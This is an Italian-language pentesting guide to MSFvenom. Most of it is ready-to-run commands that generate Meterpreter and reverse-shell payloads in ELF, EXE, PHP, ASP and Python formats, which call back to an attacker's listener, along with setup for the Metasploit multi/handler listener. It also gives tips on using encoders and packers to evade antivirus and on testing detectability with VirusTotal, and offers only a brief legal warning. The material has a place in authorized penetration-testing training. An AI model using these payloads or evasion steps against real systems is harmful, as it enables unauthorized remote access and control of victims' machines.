MSFvenom
Guida Approfondita a MSFvenom ---
Guida Approfondita a MSFvenom
MSFvenom è uno strumento integrato nel Metasploit Framework che permette di generare payloads malevoli da impiegare in test di penetrazione su diversi sistemi operativi e architetture. Supporta output in numerosi formati (eseguibili, script, shellcode, ecc.) e offre un ampio catalogo di payloads predefiniti.
⚠þ L'utilizzo improprio di msfvenom può costituire reato. Va utilizzato solo in ambienti controllati e con autorizzazione esplicita.
🔧 Sintassi Base
msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORTA> -f <FORMATO> > nome_file-p: specifica il payload.
LHOST/LPORT: IP e porta del listener.
-f: formato di output (exe, elf, php, asp, etc).
>: redirige l'output nel file desiderato.
📂 Esempi di Payload in diversi formati
#### ✅ Linux - ELF
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
chmod +x rev_shell.elf
./rev_shell.elf#### 🖥️ Windows - EXE
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe#### 💻 PHP - RAW
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php⚠️ Verifica sempre i tag PHP: aggiungi manualmente all'inizio del file se mancante.
#### 🔐 ASP - Web Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp#### 🤖 Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py⚖️ Setup del Listener su Metasploit
msfconsole
use exploit/multi/handler
set PAYLOAD <payload_usato>
set LHOST <tuo_IP>
set LPORT <tua_porta>
runEsempio per PHP:
set PAYLOAD php/reverse_php🔎 Comandi utili
- Lista payload disponibili:
msfvenom -l payloads- Lista formati supportati:
msfvenom -l formats- Lista encoder disponibili:
msfvenom -l encoders- Aggiunta encoder al payload:
msfvenom -p <payload> -e <encoder> -f <formato>Esempio:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -f exe > shell.exe⚡ Suggerimenti Operativi
- Verifica con antivirus: usa tools come
VirusTotalper testare la rilevabilità del payload.
- Obfuscazione: usa encoder o packer per evitare detection.
- Multi-handler: sempre necessario lato Metasploit per ricevere connessioni reverse.
- Payloads stageless/staged: assicurati di scegliere il tipo corretto per l'ambiente target (es.
reverse_tcpvsreverse_tcp_rc4).
📜 Conclusione
MSFvenom è uno strumento potente per la generazione di payload durante engagement di penetration testing. La padronanza di questo tool consente di adattarsi a diversi scenari, architetture e tecnologie target. L'utilizzo deve sempre essere responsabile e tracciabile.